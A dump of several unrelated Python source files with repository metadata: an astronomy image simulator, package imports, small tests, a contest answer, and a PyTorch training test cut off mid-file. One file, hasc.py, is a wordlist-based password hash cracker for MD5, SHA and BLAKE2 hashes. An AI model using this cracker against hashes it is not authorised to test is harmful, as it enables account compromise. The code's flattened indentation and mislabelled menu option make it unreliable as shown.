8539f3c70da9670fd5fe800c409d4ac5a83502c3
| 9,820
|
py
|
Python
|
SimAGNReal.py
|
myinxd/FirstTry
|
167efa4f6a4ad3665b92b264af4d1fec5be968b0
|
[
"MIT"
] | null | null | null |
SimAGNReal.py
|
myinxd/FirstTry
|
167efa4f6a4ad3665b92b264af4d1fec5be968b0
|
[
"MIT"
] | null | null | null |
SimAGNReal.py
|
myinxd/FirstTry
|
167efa4f6a4ad3665b92b264af4d1fec5be968b0
|
[
"MIT"
] | 1
|
2020-03-02T04:34:04.000Z
|
2020-03-02T04:34:04.000Z
|
# Module name: SimAGN
# Class: Elp
# Class: Flux
# Functions
# 1. Calc_Tb
# 2. SimpleSim
# 3. GenMultiFRs
import numpy as np
import PIL.Image as Image
import pyfits
import matplotlib.pyplot as plt
# define Elliptical lobe and core class
class Elp:
def __init__(self):
self.Center = np.zeros((2,))
self.MajAxis = np.zeros((1,))
self.MinAxis = np.zeros((1,))
self.Angle = np.zeros((1,))
def save_as_dict(self):
Params = {'Center':self.Center,'MajAxis':self.MajAxis,
'MinAxis':self.MinAxis,'Angle':self.Angle}
return Params
def genCore(self,ImageMat,Param_Flux):
# preparing
Area = np.pi * self.MajAxis * self.MinAxis
Rows,Cols = ImageMat.shape
if self.MajAxis > self.MinAxis:
AxisMax = self.MajAxis
C_core = np.sqrt(self.MajAxis**2 - self.MinAxis**2)
# Focus1
F1_core_x = C_core
F1_core_y = 0
# Focus2
F2_core_x = -C_core
F2_core_y = 0
else:
AxisMax = self.MinAxis
C_core = np.sqrt(self.MinAxis**2 - self.MajAxis**2)
# Focus1
F1_core_x = 0
F1_core_y = C_core
# Focus2
F2_core_x = 0
F2_core_y = -C_core
# Fill with flux
# Intergerize
a = int(np.round(self.MajAxis))
b = int(np.round(self.MinAxis))
x = np.arange(-a,a+1,1)
y = np.arange(-b,b+1,1)
# Ellipse
for i in range(len(x)):
for j in range(len(y)):
DistFocus1 = np.sqrt((x[i]-F1_core_x)**2+(y[j]-F1_core_y)**2)
DistFocus2 = np.sqrt((x[i]-F2_core_x)**2+(y[j]-F2_core_y)**2)
if (DistFocus1+DistFocus2<=2*AxisMax):
x_r = x[i]*np.cos(self.Angle) - y[j]*np.sin(self.Angle)
y_r = x[i]*np.sin(self.Angle) + y[j]*np.cos(self.Angle)
x_r = int(round(x_r+self.Center[0]))
y_r = int(round(y_r+self.Center[1]))
# Judge and Fill
if (x_r>=1) and (x_r<=Cols) and (y_r>=1) and (y_r<=Rows):
ImageMat[y_r-1][x_r-1] = Param_Flux.Calc_Tb(Area,Flag=0)
return ImageMat
def genLobes(self,ImageMat,Param_Flux,CoreAng=np.pi/2,CoreCen=np.zeros((2,))):
# preparing
Area = np.pi * self.MajAxis * self.MinAxis
Rows,Cols = ImageMat.shape
# Lobe1
RotAng = self.Angle + CoreAng
CenDiff = [self.MajAxis * np.cos(self.Angle),self.MajAxis * np.sin(self.Angle)]
self.Center[0] = CoreCen[0]+CenDiff[0]*np.cos(CoreAng)-CenDiff[1]*np.sin(CoreAng)
self.Center[1] = CoreCen[1]+CenDiff[0]*np.sin(CoreAng)+CenDiff[1]*np.cos(CoreAng)
if self.MajAxis > self.MinAxis:
AxisMax = self.MajAxis
C_core = np.sqrt(self.MajAxis**2 - self.MinAxis**2)
# Focus1
F1_core_x = C_core
F1_core_y = 0
# Focus2
F2_core_x = -C_core
F2_core_y = 0
else:
AxisMax = self.MinAxis
C_core = np.sqrt(self.MinAxis**2 - self.MajAxis**2)
# Focus1
F1_core_x = 0
F1_core_y = C_core
# Focus2
F2_core_x = 0
F2_core_y = -C_core
a = int(np.round(self.MajAxis))
b = int(np.round(self.MinAxis))
x = np.arange(-a,a+1,1)
y = np.arange(-b,b+1,1)
# Ellipse
for i in range(len(x)):
for j in range(len(y)):
DistFocus1 = np.sqrt((x[i]-F1_core_x)**2+(y[j]-F1_core_y)**2)
DistFocus2 = np.sqrt((x[i]-F2_core_x)**2+(y[j]-F2_core_y)**2)
if (DistFocus1+DistFocus2<=2*AxisMax):
x_r = x[i]*np.cos(RotAng) - y[j]*np.sin(RotAng)
y_r = x[i]*np.sin(RotAng) + y[j]*np.cos(RotAng)
x_r = int(round(x_r+self.Center[0]))
y_r = int(round(y_r+self.Center[1]))
# Judge and Fill
if (x_r>=1) and (x_r<=Cols) and (y_r>=1) and (y_r<=Rows):
ImageMat[y_r-1][x_r-1] = Param_Flux.Calc_Tb(Area,Flag=1)
# Lobe2
Rot_Ang = self.Angle + CoreAng + np.pi
CenDiff = [self.MajAxis * np.cos(self.Angle),self.MajAxis * np.sin(self.Angle)]
self.Center[0] = CoreCen[0]+CenDiff[0]*np.cos(CoreAng + np.pi)-CenDiff[1]*np.sin(CoreAng + np.pi)
self.Center[1] = CoreCen[1]+CenDiff[0]*np.sin(CoreAng + np.pi)+CenDiff[1]*np.cos(CoreAng + np.pi)
if self.MajAxis > self.MinAxis:
AxisMax = self.MajAxis
C_core = np.sqrt(self.MajAxis**2 - self.MinAxis**2)
# Focus1
F1_core_x = C_core
F1_core_y = 0
# Focus2
F2_core_x = -C_core
F2_core_y = 0
else:
AxisMax = self.MinAxis
C_core = np.sqrt(self.MinAxis**2 - self.MajAxis**2)
# Focus1
F1_core_x = 0
F1_core_y = C_core
# Focus2
F2_core_x = 0
F2_core_y = -C_core
a = int(np.round(self.MajAxis))
b = int(np.round(self.MinAxis))
x = np.arange(-a,a+1,1)
y = np.arange(-b,b+1,1)
# Ellipse
for i in range(len(x)):
for j in range(len(y)):
DistFocus1 = np.sqrt((x[i]-F1_core_x)**2+(y[j]-F1_core_y)**2)
DistFocus2 = np.sqrt((x[i]-F2_core_x)**2+(y[j]-F2_core_y)**2)
if (DistFocus1+DistFocus2<=2*AxisMax):
x_r = x[i]*np.cos(RotAng) - y[j]*np.sin(RotAng)
y_r = x[i]*np.sin(RotAng) + y[j]*np.cos(RotAng)
x_r = int(round(x_r+self.Center[0]))
y_r = int(round(y_r+self.Center[1]))
# Judge and Fill
if (x_r>=1) and (x_r<=Cols) and (y_r>=1) and (y_r<=Rows):
ImageMat[y_r-1][x_r-1] = Param_Flux.Calc_Tb(Area,Flag=1)
return ImageMat
class Flux:
def __init__(self,Freq = 150,ClassType=1):
self.I_151 = 10**(np.random.uniform(-4,-3))
self.Freq = Freq
self.ClassType = ClassType
def genSpec(self):
# generate the spectrum
# Use IF-THEN to replace SWITCH-CASE
if self.ClassType == 1:
Spec_lobe = (self.Freq/151e6)**-0.75*self.I_151
a0 = np.log10(self.I_151)-0.7*np.log10(151e6)+0.29*np.log10(151e6)*np.log10(151e6)
lgs = a0+0.7*np.log10(self.Freq)-0.29*np.log10(self.Freq)*np.log10(self.Freq)
Spec_core = 10**lgs
Spec = np.array([Spec_core,Spec_lobe])
elif self.ClassType == 2:
Spec_lobe = (self.Freq/151e6)**-0.75*self.I_151
Spec_hotspot = (self.Freq/151e6)**-0.75*self.I_151
a0 = np.log10(self.I_151)-0.7*np.log10(151e6)+0.29*np.log10(151e6)*np.log10(151e6)
lgs = a0+0.7*np.log10(self.Freq)-0.29*np.log10(self.Freq)*np.log10(self.Freq)
Spec_core = 10**lgs
Spec = np.array([Spec_core,Spec_lobe,Spec_hotspot])
return Spec
# Calc_Tb
def Calc_Tb(self,Area,Flag=0):
c = 2.99792458e8
kb = 1.38e-23
flux_in_Jy = self.genSpec()[Flag]
Omegab = Area/(3600*180/np.pi)/(3600*180/np.pi)
Sb = flux_in_Jy * 1e-26 /Omegab
FluxPixel = Sb/2/self.Freq/self.Freq*c*c/kb
return FluxPixel
def SimpleSim(Rows=512,Cols=512):
# Init
Param_core = Elp()
Param_lobe = Elp()
Param_Flux = Flux()
ImageMat = np.zeros((Rows,Cols))
# Caution: pay attention to the index
# Core parameters
Param_core.Center[0] = np.random.uniform(1,Cols)
Param_core.Center[1] = np.random.uniform(1,Rows)
Param_core.MajAxis = np.random.uniform(0,1)
Param_core.MinAxis = np.random.uniform(0,1)
Param_core.Angle = np.random.uniform(-np.pi,np.pi)
# Love parameters
Param_lobe.MajAxis = np.random.uniform(0,10)
Param_lobe.MinAxis = np.random.uniform(0,4)
Param_lobe.Angle = np.random.uniform(-np.pi,np.pi)
# Embed into the image mat
ImgLobe = Param_lobe.genLobes(ImageMat,Param_Flux,CoreAng=Param_core.Angle, CoreCen=Param_core.Center)
ImgCore = Param_core.genCore(ImageMat,Param_Flux)
ImageMat = ImgLobe+ImgCore
# Display
#Idx = np.argwhere(ImageMat>0)
#ImageMat[Idx[:,0],Idx[:,1]] = 100
ImgTest = Image.fromarray(ImageMat)
ImgTest.show()
def GenMultiFRs(Rows=512,Cols=512,Freq=150,NumFR=100):
# Generate multiple simulated FRs
# Init
Param_core = Elp()
Param_lobe = Elp()
Param_Flux = Flux()
Param_Flux.Freq = Freq
ImageMat = np.zeros((Rows,Cols))
for x in range(NumFR):
print 'FR %d' % x
# Core parameters
Param_core.Center[0] = np.random.uniform(1,Cols)
Param_core.Center[1] = np.random.uniform(1,Rows)
Param_core.MajAxis = np.random.uniform(0,1)
Param_core.MinAxis = np.random.uniform(0,1)
Param_core.Angle = np.random.uniform(-np.pi,np.pi)
# Lobe parameters
Param_lobe.MajAxis = np.random.uniform(0,5)
Param_lobe.MinAxis = np.random.uniform(0,2)
Param_lobe.Angle = np.random.uniform(-np.pi,np.pi)
# Embed into the image mat
ImgLobe = Param_lobe.genLobes(ImageMat,Param_Flux,CoreAng=Param_core.Angle, CoreCen=Param_core.Center)
ImgCore = Param_core.genCore(ImageMat,Param_Flux)
ImageMat = ImgLobe+ImgCore
# Display
Idx = np.argwhere(ImageMat>0)
ImageMat[Idx[:,0],Idx[:,1]] = 100
ImgTest = Image.fromarray(ImageMat)
ImgTest = ImgTest.convert('RGB')
FileName = 'Img_'+str(Freq)+'.jpg'
ImgTest.save(FileName)
ImgTest.show()
| 36.102941
| 110
| 0.552546
| 1,459
| 9,820
| 3.579164
| 0.114462
| 0.048449
| 0.048832
| 0.024512
| 0.764267
| 0.735159
| 0.728074
| 0.715818
| 0.699732
| 0.699732
| 0
| 0.055206
| 0.304582
| 9,820
| 271
| 111
| 36.236162
| 0.709474
| 0.068839
| 0
| 0.687831
| 0
| 0
| 0.004512
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.021164
| null | null | 0.005291
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
8559b515263f384e18aed6b99cfd9a3a5ca8c138
| 80
|
py
|
Python
|
notebooks/figures/funnel/__init__.py
|
mgrover1/cesm2-marbl-book
|
670375dd5ed800afd4a86de9871a7d44c535a3f0
|
[
"Apache-2.0"
] | null | null | null |
notebooks/figures/funnel/__init__.py
|
mgrover1/cesm2-marbl-book
|
670375dd5ed800afd4a86de9871a7d44c535a3f0
|
[
"Apache-2.0"
] | 4
|
2021-06-10T15:22:33.000Z
|
2021-06-21T19:29:03.000Z
|
notebooks/figures/funnel/__init__.py
|
mgrover1/cesm2-marbl-book
|
670375dd5ed800afd4a86de9871a7d44c535a3f0
|
[
"Apache-2.0"
] | 1
|
2021-05-18T18:41:57.000Z
|
2021-05-18T18:41:57.000Z
|
from . core import Collection, register_derived_var, register_query_dependent_op
| 80
| 80
| 0.8875
| 11
| 80
| 6
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075
| 80
| 1
| 80
| 80
| 0.891892
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
857a6f4968e0416c3c09ee515c59ea01f0c88026
| 466
|
py
|
Python
|
amocrm_api_client/token_provider/core/__init__.py
|
iqtek/amocrm_api_client
|
910ea42482698f5eb47d6b6e12d52ec09af77a3e
|
[
"MIT"
] | null | null | null |
amocrm_api_client/token_provider/core/__init__.py
|
iqtek/amocrm_api_client
|
910ea42482698f5eb47d6b6e12d52ec09af77a3e
|
[
"MIT"
] | null | null | null |
amocrm_api_client/token_provider/core/__init__.py
|
iqtek/amocrm_api_client
|
910ea42482698f5eb47d6b6e12d52ec09af77a3e
|
[
"MIT"
] | null | null | null |
from .exceptions import AuthorizationCodeExpiredException
from .exceptions import InvalidAuthorizationDataException
from .exceptions import RefreshTokenExpiredException
from .ICheckAccessTokenFunction import ICheckAccessTokenFunction
from .IGetTokensByAuthCodeFunction import IGetTokensByAuthCodeFunction
from .IGetTokensByRefreshTokenFunction import IGetTokensByRefreshTokenFunction
from .ITokenProvider import ITokenProvider
from .TokensBundle import TokensBundle
| 51.777778
| 78
| 0.914163
| 32
| 466
| 13.3125
| 0.34375
| 0.098592
| 0.140845
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.06867
| 466
| 8
| 79
| 58.25
| 0.981567
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
857efbac00175a7f1b9b930c7299df4e8766bb62
| 55
|
py
|
Python
|
vnpy/api/bitmex/__init__.py
|
black0144/vnpy
|
0d0ea30dad14a0150f7500ff9a62528030321426
|
[
"MIT"
] | 34
|
2018-07-13T11:30:46.000Z
|
2022-01-05T13:48:10.000Z
|
vnpy/api/bitmex/__init__.py
|
black0144/vnpy
|
0d0ea30dad14a0150f7500ff9a62528030321426
|
[
"MIT"
] | null | null | null |
vnpy/api/bitmex/__init__.py
|
black0144/vnpy
|
0d0ea30dad14a0150f7500ff9a62528030321426
|
[
"MIT"
] | 22
|
2018-07-13T11:30:48.000Z
|
2021-09-25T13:30:08.000Z
|
from .vnbitmex import BitmexRestApi, BitmexWebsocketApi
| 55
| 55
| 0.890909
| 5
| 55
| 9.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.072727
| 55
| 1
| 55
| 55
| 0.960784
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
8580a2d2fe660c074062f1272c3e1759782a3e9b
| 4,444
|
py
|
Python
|
hasc.py
|
teamx4ck/Hasc
|
b4e983ca678b5680b2a3c398fd9dc1da12f95ab6
|
[
"BSL-1.0"
] | 1
|
2021-05-10T06:27:16.000Z
|
2021-05-10T06:27:16.000Z
|
hasc.py
|
teamx4ck/Hasc
|
b4e983ca678b5680b2a3c398fd9dc1da12f95ab6
|
[
"BSL-1.0"
] | 1
|
2021-05-13T04:19:24.000Z
|
2021-05-29T16:46:58.000Z
|
hasc.py
|
teamx4ck/Hasc
|
b4e983ca678b5680b2a3c398fd9dc1da12f95ab6
|
[
"BSL-1.0"
] | null | null | null |
from os import system as sy
from time import sleep as slp
import sys
import hashlib
import itertools
import threading
sy('clear')
red='\u001b[31m'
grn='\u001b[32m'
cyn='\u001b[36m'
re='\u001b[0m'
ban=cyn+'''
/$$ /$$ /$$$$$$ /$$$$$$ /$$$$$$
| $$ | $$ /$$__ $$ /$$__ $$ /$$__ $$
| $$ | $$| $$ \ $$| $$ \__/| $$ \__/
| $$$$$$$$| $$$$$$$$| $$$$$$ | $$
| $$__ $$| $$__ $$ \____ $$| $$
| $$ | $$| $$ | $$ /$$ \ $$| $$ $$
| $$ | $$| $$ | $$| $$$$$$/| $$$$$$/
|__/ |__/|__/ |__/ \______/ \______/
'''+re
print(ban)
def md5(wd,hah):
try:
open(wd,'r')
except:
print(red+'Wordlist Not found!'+re)
slp(2)
sy('clear')
sy('python hasc.py')
f=open(wd,'r')
while True:
rt=f.readline()
rf=rt.replace('\n','').encode()
rehash=hashlib.md5(rf).hexdigest()
if hah==rehash:
done = True
print(grn+'Hash Found : '+rf.decode()); break
else:
pass
if len(rf)==0:
print(red+'Hash not in wordlist..'+re); break
def sha256(wd,hah):
try:
open(wd,'r')
except:
print(red+'Wordlist Not found!'+re)
slp(2)
sy('clear')
sy('python hasc.py')
f=open(wd,'r')
while True:
rt=f.readline()
rf=rt.replace('\n','').encode()
rehash=hashlib.sha256(rf).hexdigest()
print(rehash)
if hah==rehash:
done = True
print(grn+'Hash Found : '+rf.decode()); break
else:
pass
if len(rf)==0:
print(red+'Hash not in wordlist..'+re); break
def sha512(wd,hah):
try:
open(wd,'r')
except:
print(red+'Wordlist Not found!'+re)
slp(2)
sy('clear')
sy('python hasc.py')
f=open(wd,'r')
while True:
rt=f.readline()
rf=rt.replace('\n','').encode()
rehash=hashlib.sha512(rf).hexdigest()
if hah==rehash:
done = True
print(grn+'Hash Found : '+rf.decode()); break
else:
pass
if len(rf)==0:
print(red+'Hash not in wordlist..'+re); break
def sha3_256(wd,hah):
try:
open(wd,'r')
except:
print(red+'Wordlist Not found!'+re)
slp(2)
sy('clear')
sy('python hasc.py')
f=open(wd,'r')
while True:
rt=f.readline()
rf=rt.replace('\n','').encode()
rehash=hashlib.sha3_256(rf).hexdigest()
if hah==rehash:
done = True
print(grn+'Hash Found : '+rf.decode()); break
else:
pass
if len(rf)==0:
print(red+'Hash not in wordlist..'+re); break
def sha3_512(wd,hah):
try:
open(wd,'r')
except:
print(red+'Wordlist Not found!'+re)
slp(2)
sy('clear')
sy('python hasc.py')
f=open(wd,'r')
while True:
rt=f.readline()
rf=rt.replace('\n','').encode()
rehash=hashlib.sha3_512(rf).hexdigest()
if hah==rehash:
done = True
print(grn+'Hash Found : '+rf.decode()); break
else:
pass
if len(rf)==0:
print(red+'Hash not in wordlist..'+re); break
def blake2b(wd,hah):
try:
open(wd,'r')
except:
print(red+'Wordlist Not found!'+re)
slp(2)
sy('clear')
sy('python hasc.py')
f=open(wd,'r')
while True:
rt=f.readline()
rf=rt.replace('\n','').encode()
rehash=hashlib.blake2b(rf).hexdigest()
if hah==rehash:
done = True
print(grn+'Hash Found : '+rf.decode()); break
else:
pass
if len(rf)==0:
print(red+'Hash not in wordlist..'+re); break
def blake2s(wd,hah):
try:
open(wd,'r')
except:
print(red+'Wordlist Not found!'+re)
slp(2)
sy('clear')
sy('python hasc.py')
f=open(wd,'r')
while True:
rt=f.readline()
rf=rt.replace('\n','').encode()
rehash=hashlib.blake2s(rf).hexdigest(); print(rehash)
if hah==rehash:
done = True
print(grn+'Hash Found : '+rf.decode()); break
else:
pass
if len(rf)==0:
print(red+'Hash not in wordlist..'+re); break
def opt(n,nm):
print(cyn+'['+n+'] '+grn+nm+re)
opt('1','MD5')
opt('2','SHA-256')
opt('3','SHA-512')
opt('4','SHA-3-256')
opt('5','SHA-3-512')
opt('6','BLAKE2c')
opt('7','BLAKE2b')
opt('00','Exit')
opt = input(red+'\n[>] '+cyn+'Enter your option : '+re)
if opt=='1' or opt=='2' or opt=='3' or opt=='4' or opt=='5' or opt=='6' or opt=='7':
pass
elif opt=='0' or opt=='00':
slp(1)
print(red+'Bye'+re)
sys.exit()
else:
print(red+'Option Not found!!'+re)
slp(2)
sy('clear')
sy('python hasc.py')
hash=input(red+'[>] '+cyn+'Enter HASH : '+re)
wordlist=input(red+'[>] '+cyn+'Enter Wordlist path : '+re)
if opt=='1':
md5(wordlist,hash)
elif opt=='2':
sha256(wordlist,hash)
elif opt=='3':
sha512(wordlist,hash)
elif opt=='4':
sha3_256(wordlist,hash)
elif opt=='5':
sha3_512(wordlist,hash)
elif opt=='6':
blake2s(wordlist,hash)
elif opt=='7':
blake2b(wordlist,hash)
else:
print(red+'Not Found!!!')
| 21.263158
| 84
| 0.573582
| 687
| 4,444
| 3.646288
| 0.128093
| 0.054291
| 0.039122
| 0.041517
| 0.705389
| 0.705389
| 0.705389
| 0.705389
| 0.705389
| 0.705389
| 0
| 0.035284
| 0.177318
| 4,444
| 208
| 85
| 21.365385
| 0.649891
| 0
| 0
| 0.655172
| 0
| 0
| 0.251125
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039409
| false
| 0.039409
| 0.029557
| 0
| 0.068966
| 0.137931
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
85a3c5caee8c0d52f5487970b3da7f636cbd112e
| 627
|
py
|
Python
|
src/tests/metrics/test_accuracy.py
|
lab-a1/pyai
|
0d05324fdf0ac07117eb5f4fde6b90d6cec10479
|
[
"WTFPL"
] | null | null | null |
src/tests/metrics/test_accuracy.py
|
lab-a1/pyai
|
0d05324fdf0ac07117eb5f4fde6b90d6cec10479
|
[
"WTFPL"
] | null | null | null |
src/tests/metrics/test_accuracy.py
|
lab-a1/pyai
|
0d05324fdf0ac07117eb5f4fde6b90d6cec10479
|
[
"WTFPL"
] | null | null | null |
from pyai import metrics
import numpy as np
def test_accuracy_1():
y_true = np.array([1, 1, 0, 1, 0, 0])
y_hat = np.array([1, 1, 0, 0, 0, 0])
accuracy = metrics.accuracy(y_true, y_hat)
assert round(accuracy, 3) == 0.833
def test_accuracy_2():
y_true = np.array([1, 1, 0, 1, 0, 0])
y_hat = np.array([1, 1, 1, 0, 0, 0])
accuracy = metrics.accuracy(y_true, y_hat)
assert round(accuracy, 3) == 0.667
def test_accuracy_3():
y_true = np.array([1, 1, 0, 1, 0, 0])
y_hat = np.array([0, 0, 0, 0, 0, 0])
accuracy = metrics.accuracy(y_true, y_hat)
assert round(accuracy, 3) == 0.5
| 23.222222
| 46
| 0.594896
| 119
| 627
| 2.983193
| 0.193277
| 0.073239
| 0.059155
| 0.126761
| 0.743662
| 0.735211
| 0.735211
| 0.735211
| 0.735211
| 0.735211
| 0
| 0.108108
| 0.232855
| 627
| 26
| 47
| 24.115385
| 0.629938
| 0
| 0
| 0.352941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.176471
| 1
| 0.176471
| false
| 0
| 0.117647
| 0
| 0.294118
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
85b12f48e402383950ddc618eb498b50ebc174c0
| 97
|
py
|
Python
|
contests_yukicoder/283/283_e.py
|
takelifetime/competitive-programming
|
e7cf8ef923ccefad39a1727ca94c610d650fcb76
|
[
"BSD-2-Clause"
] | null | null | null |
contests_yukicoder/283/283_e.py
|
takelifetime/competitive-programming
|
e7cf8ef923ccefad39a1727ca94c610d650fcb76
|
[
"BSD-2-Clause"
] | 1
|
2021-01-02T06:36:51.000Z
|
2021-01-02T06:36:51.000Z
|
contests_yukicoder/283/283_e.py
|
takelifetime/competitive-programming
|
e7cf8ef923ccefad39a1727ca94c610d650fcb76
|
[
"BSD-2-Clause"
] | null | null | null |
n = int(input())
ans = [2 * 10 ** 9, 10 ** 9] + list(range(2, n + 1)) + [2 * 10 ** 9]
print(*ans)
| 32.333333
| 68
| 0.443299
| 19
| 97
| 2.263158
| 0.578947
| 0.209302
| 0.186047
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.178082
| 0.247423
| 97
| 3
| 69
| 32.333333
| 0.410959
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
85bf3a8a74b1f81b30be9b7a43d2c08c9d253ce3
| 16,736
|
py
|
Python
|
tests/test_training.py
|
ruflab/soc
|
b8508c92a8a27331292c8665cde01a9269b30897
|
[
"Apache-2.0"
] | null | null | null |
tests/test_training.py
|
ruflab/soc
|
b8508c92a8a27331292c8665cde01a9269b30897
|
[
"Apache-2.0"
] | null | null | null |
tests/test_training.py
|
ruflab/soc
|
b8508c92a8a27331292c8665cde01a9269b30897
|
[
"Apache-2.0"
] | null | null | null |
import os
import time
import shutil
import unittest
import pandas as pd
import torch
from unittest.mock import MagicMock
from pytorch_lightning import seed_everything, Trainer
from hydra.experimental import initialize, compose
from hydra.core.config_store import ConfigStore
from soc import models, datasets
from soc.training import SocConfig
from soc.datasets import make_dataset
from soc.runners import make_runner
cfd = os.path.dirname(os.path.realpath(__file__))
fixture_dir = os.path.join(cfd, 'fixtures')
_DATASET_PATH = os.path.join(fixture_dir, 'soc_seq_3_fullseq.pt')
_RAW_DATASET_PATH = os.path.join(fixture_dir, 'soc_seq_3_raw_df.pt')
_TEXT_BERT_DATASET_PATH = os.path.join(fixture_dir, 'soc_text_bert_3_fullseq.pt')
_RAW_TEXT_BERT_DATASET_PATH = os.path.join(fixture_dir, 'soc_text_bert_3_raw_df.pt')
class TestTraining(unittest.TestCase):
@classmethod
def setUpClass(cls):
cs = ConfigStore.instance()
cs.store(name="config", node=SocConfig)
cs.store(group="runner/model", name="convlstm", node=models.ConvLSTMConfig)
cs.store(group="runner/model", name="convlstmpolicy", node=models.ConvLSTMConfig)
cs.store(group="runner/model", name="conv3d", node=models.Conv3dModelConfig)
cs.store(group="runner/model", name="conv3dpolicy", node=models.Conv3dModelConfig)
cs.store(group="runner/model", name="resnet18", node=models.ResNetConfig)
cs.store(group="runner/model", name="resnet18policy", node=models.ResNetConfig)
cs.store(group="runner/model", name="resnet18fusionpolicy", node=models.ResNetFusionConfig)
cs.store(
group="runner/model", name="resnet18meanconcatpolicy", node=models.ResNetFusionConfig
)
cs.store(group="runner/model", name="resnet18meanffpolicy", node=models.ResNetFusionConfig)
cs.store(group="runner/dataset", name="psqlseqsatos", node=datasets.PSQLConfig)
cs.store(
group="runner/dataset",
name="preprocessedforwardsatosa",
node=datasets.PreprocessedForwardConfig
)
cs.store(
group="runner/dataset",
name="preprocessedforwardsatosapolicy",
node=datasets.PreprocessedForwardConfig
)
cs.store(
group="runner/dataset",
name="preprocessedseqsatosapolicy",
node=datasets.PreprocessedSeqConfig
)
cs.store(
group="runner/dataset",
name="psqltextbertforwardsatosapolicy",
node=datasets.PSQLTextForwardConfig
)
cs.store(
group="runner/dataset",
name="preprocessedtextbertforwardsatosapolicy",
node=datasets.PreprocessedTextForwardConfig
)
cs.store(
group="runner/dataset",
name="filetextbertforwardsatosapolicy",
node=datasets.FileTextForwardConfig
)
cs.store(
group="runner/dataset",
name="filetextberthumantradeforwardsatosapolicy",
node=datasets.FileTextForwardConfig
)
cls.data = torch.load(_RAW_DATASET_PATH)
cls.data_text_bert = torch.load(_RAW_TEXT_BERT_DATASET_PATH)
def _get_states_from_db_se_f(idx: int) -> pd.DataFrame:
return cls.data[idx][0]
def _get_actions_from_db_se_f(idx: int) -> pd.DataFrame:
return cls.data[idx][1]
def _get_length_se_f() -> int:
return len(cls.data)
def setup_dataset(self, hparams):
dataset = make_dataset(hparams.dataset)
dataset._get_states_from_db = MagicMock(side_effect=_get_states_from_db_se_f)
dataset._get_actions_from_db = MagicMock(side_effect=_get_actions_from_db_se_f)
dataset._get_length = MagicMock(side_effect=_get_length_se_f)
return dataset, None
cls.setup_dataset = setup_dataset
def _get_text_states_from_db_se_f(
table_id: int, start_row_id: int, end_row_id: int
) -> pd.DataFrame:
df = cls.data_text_bert[table_id][0]
return df[start_row_id:end_row_id]
def _get_text_actions_from_db_se_f(
table_id: int, start_row_id: int, end_row_id: int
) -> pd.DataFrame:
df = cls.data_text_bert[table_id][1]
df = df[(df['beforestate'] >= start_row_id + 1) & (df['beforestate'] < end_row_id + 1)]
if len(df) < (end_row_id - start_row_id):
# At the end of the trajectory, there is no action after the last state
# In this special case, we add it again
df = df.append(df.iloc[-1])
return df
def _get_text_chats_from_db_se_f(
table_id: int, start_row_id: int, end_row_id: int
) -> pd.DataFrame:
df = cls.data_text_bert[table_id][2]
df = df[(df['current_state'] >= start_row_id + 1)
& (df['current_state'] < end_row_id + 1)]
return df
def _get_text_nb_steps_se_f():
return [len(cls.data_text_bert[i][0]) for i in range(len(cls.data_text_bert))]
def _get_text_length_se_f() -> int:
return len(cls.data_text_bert)
